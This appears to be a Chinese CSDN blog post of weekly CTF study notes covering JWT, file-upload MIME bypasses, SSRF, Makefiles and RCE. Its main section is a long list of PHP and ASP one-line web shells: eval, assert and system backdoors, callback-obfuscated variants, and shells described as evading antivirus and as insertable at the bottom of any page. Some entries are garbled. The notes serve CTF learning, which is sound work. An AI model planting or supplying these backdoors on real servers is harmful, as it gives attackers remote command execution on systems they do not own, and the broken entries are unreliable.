本周知识总结

本文详细介绍了JWT在用户认证中的应用,涉及Wireshark中的HTTP协议分析,以及PHP中常见的木马代码如eval函数。此外,还讨论了服务器端的MIME类型检测防止文件上传漏洞,SSRF漏洞的原理、攻击与防御,Makefile的作用和RCE漏洞的利用技巧,以及相对路径与绝对路径的区别。
摘要由CSDN通过智能技术生成

JWT

一文讲解JWT用户认证全流程 - 知乎 (zhihu.com)

        在wireshark中http协议查看或者有应用,注意与php中session区别。

mime测试

实验原理:文件上传从客户端进行检测显然是防护不足的,所以需要从服务器端进行防护。
 服务端的检测与绕过方法有很多,常见的有:
1.后缀名检测绕过
2.MIME类型检测与绕过
3.文件内容检测与绕过
4.00截断绕过
5.条件竞争检测与绕过

应用可见[SWPUCTF 2021 新生赛]easyupload3.0赛题

php常见一句话木马

1.<?php @eval($_POST['r00ts']);?>
2.<?php phpinfo();?>
3.<?php @eval($_POST[cmd]);?>
4.<?php @eval($_REQUEST[cmd]);?>
5.<?php assert($_REQUEST[cmd]); ?>
6.<?php //?cmd=phpinfo() @preg_replace("/abc/e",$_REQUEST['cmd'],"abcd"); ?>
<?php
//?cmd=phpinfo();
$func =create_function('',$_REQUEST['cmd']);
$func();
?>
<?php
//?func=system&cmd=whoami
$func=$_GET['func'];
$cmd=$_GET['cmd'];
$array[0]=$cmd;
$new_array=array_map($func,$array);
//print_r($new_array);
?>
<?php
//?cmd=phpinfo()
@call_user_func(assert,$_GET['cmd']);
?>
<?php
//?cmd=phpinfo()
$cmd=$_GET['cmd'];
$array[0]=$cmd;
call_user_func_array("assert",$array);
?>
<?php
//?func=system&cmd=whoami
$cmd=$_GET['cmd'];
$array1=array($cmd);
$func =$_GET['func'];
array_filter($array1,$func);
?>
<?php usort($_GET,'asse'.'rt');?> php环境>=<5.6才能用
<?php usort(...$_GET);?>  php环境>=5.6才能用
<?php eval($_POST1);?>
<?php if(isset($_POST['c'])){eval($_POST['c']);}?>
<?php system($_REQUEST1);?>
<?php ($_=@$_GET1).@$_($_POST1)?>
<?php eval_r($_POST1)?>
<?php @eval_r($_POST1)?>//容错代码
<?php assert($_POST1);?>//使用Lanker一句话客户端的专家模式执行相关的PHP语句
<?$_POST['c']($_POST['cc']);?>
<?$_POST['c']($_POST['cc'],$_POST['cc'])?>
<?php @preg_replace("/[email]/e",$_POST['h'],"error");?>/使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入/:<O>h=@eval_r($_POST1);</O>
<?php echo `$_GET['r']` ?>
<script language="php">@eval_r($_POST[sb])</script> //绕过<?限制的一句话
<?php (])?>   上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错,比如 index.asp里面也是可以的!
<?if(isset($_POST['1'])){eval($_POST['1']);}?><?php system ($_REQUEST[1]);?>
加了判断的PHP一句话,与上面的ASP一句话相同道理,也是可以插在任何PHP文件 的最底部不会出错!
<%execute request(“class”)%><%'<% loop <%:%><%'<% loop <%:%><%execute request (“class”)%><%execute request(“class”)'<% loop <%:%>
无防下载表,有防下载表可尝试插入以下语句突破的一句话
%eval(request(“1″)):response.end% 备份专用

SSRF

SSRF漏洞原理攻击与防御(超详细总结)-CSDN博客

MAKEFLIE

1.1 什么是Makefile?
C语言中,我们使用visual studio开发软件时候,写程序开始时候都会创建一个project项目文件,然后在文件里面编译 .h 和 .c 的文件。
在Linux中,有一个叫make的东西,就相当于C语言的集成开发环境,我们只需要在make里面创建文件,写代码,make会帮我们管理这些文件。
不过我们创建的项目不叫project,而是称为Makefile,打开一个make源程序包,发现很多Makefile的文件,说明里面有很多的项目。
在源程序包里面,也有名为makefile的文件(m是小写),两个命名同时存在,这是合理的,在开发一个项目的时候,工程师一般都会命名为Makefile然后打包交给用户,用户觉得某个Makefile需要改动,用户改动后或者新建后的项目定义为makefile,并且在运行时候,先执行makefile,再执行Makefile文件。

RCE

~取反;URL编码取反绕过正则实现RCE.

应用:[SWPUCTF 2021 新生赛]hardrce

相对路径与绝对路径

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值